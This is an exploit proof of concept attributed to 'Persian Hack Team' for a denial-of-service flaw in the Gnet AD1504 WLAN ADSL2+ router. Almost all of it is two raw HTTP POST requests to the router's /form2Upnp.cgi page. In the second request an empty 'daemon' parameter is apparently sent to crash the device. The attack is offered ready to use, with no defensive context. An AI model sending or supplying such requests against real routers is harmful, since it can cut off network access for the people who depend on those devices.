# Exploit Title: Gnet AD1504 Wlan Adsl2+ Router - Denial of Service
# Date: 2016-12-21
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Home : http://persian-team.ir/
# Tested on: Windows AND Linux
# Demo : https://youtu.be/6rHJMhyYR9s
POC :
daemon Parameter Vulnerable
POST /form2Upnp.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.1/upnp.htm
Cookie: sessionid=13df8bc9; Language=en; SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
daemon=1&ext_if=pppoe+1&submit.htm%3Fupnp.htm=Send
Request :
Post Empty daemon Parameter
POST /form2Upnp.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.1/upnp.htm
Cookie: sessionid=13df8bc9; Language=en; SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
daemon= &ext_if=pppoe+1&submit.htm%3Fupnp.htm=Send
